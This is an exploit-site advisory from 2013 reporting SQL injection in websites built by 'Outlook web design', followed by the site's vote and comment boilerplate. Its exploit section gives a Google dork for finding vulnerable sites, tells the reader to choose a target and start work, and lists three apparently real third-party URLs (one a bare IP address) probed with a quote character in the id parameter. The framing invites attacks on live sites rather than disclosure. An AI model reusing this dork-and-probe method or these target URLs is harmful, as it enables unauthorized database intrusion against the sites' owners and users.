Outlook web design SQL injection Vulnerability

2013.02.21

Credit: silent

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:\"outlook web design\" & inurl:\"id=\"

############################################################
Title: Outlook web SQL injection Vulnerability
Author : danger-team
Discovered By : silent
outlook web design home : http://outlookdesign.com/
Google Dork: intext:"outlook web Design" & inurl:"id="
####################### [EXPLOIT] #########################
This Vulnerability apears in outlook web design sites.
outlook home is here => http://outlookdesign.com/
first search this Dork in Google :
intext:"outlook web design" & inurl:"id="
You may see Lots Of Targets.
choose one target. And start your work.
Demo =>
http://www.sjbpXXXarish.com/parks_photos.php?id=-1%27
http://www.articlXXeofweek.com/article.php?id=7586%27
http://208.112.65.66/news_details.php?id=932%27
####################### [/EXPLOIT] #######################

References:

http://outlookdesign.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Outlook web design SQL injection Vulnerability

Dork: intext:\"outlook web design\" & inurl:\"id=\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.